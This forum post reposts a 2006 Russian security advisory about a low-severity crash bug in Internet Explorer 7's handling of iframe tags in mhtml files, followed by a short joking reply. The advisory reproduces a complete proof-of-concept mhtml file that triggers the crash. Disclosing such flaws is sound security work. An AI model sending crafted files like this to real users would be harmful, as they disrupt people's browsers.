Уязвимость при обработке mhtml файлов в Internet Explorer 7

[B]02 ноября, 2006[/B]

[B]Программа: [/B]Microsoft Internet Explorer 7

[B]Опасность: [/B][B][COLOR="Green"]Низкая[/COLOR][/B]

[B]Наличие эксплоита: [/B][B][COLOR="Red"]Да[/COLOR][/B]

[B]Описание: [/B]
Уязвимость позволяет удаленному пользователю аварийно завершить работу браузера.
Уязвимость существует из-за ошибки при обработке параметров тега iframe в mhtml файлах. Удаленный пользователь может с помощью специально сформированного mhtml файла аварийно завершить работу браузера. Пример mhtml файла:
Subject: Positive TechnologiesDate: Sat, 23 Sep 2006 23:05:22 +0400MIME-Version: 1.0Content-Type: multipart/related;type="text/html";boundary="----=_NextPart_000_0000_01C6DF64.BF10C9F0"X-MimeOLE: Produced By IE Fuzz 0.1This is a multi-part message in MIME format.------=_NextPart_000_0000_01C6DF64.BF10C9F0Content-Type: text/html;charset="windows-1251"Content-Transfer-Encoding: quoted-printableContent-Location: about:blank<iframe name=3Difr src=3D"">------=_NextPart_000_0000_01C6DF64.BF10C9F0--

[B]URL производителя: [/B][URL="http://www.microsoft.com"][COLOR=#0000ff]www.microsoft.com[/COLOR][/URL]

[URL="http://www.securitylab.ru/vulnerability/276342.php"]securitylab.ru[/URL]

[quote=ALEX(XX)][B]02 ноября, 2006[/B]

[B]Программа: [/B]Microsoft Internet Explorer 7

[B]Опасность: [/B][B][COLOR=green]Низкая[/COLOR][/B]

[B]Наличие эксплоита: [/B][B][COLOR=red]Да[/COLOR][/B]


[URL="http://www.securitylab.ru/vulnerability/276342.php"]securitylab.ru[/URL][/quote]
Началось!?
Зато какая реклама.:oops: M$- чего уж там.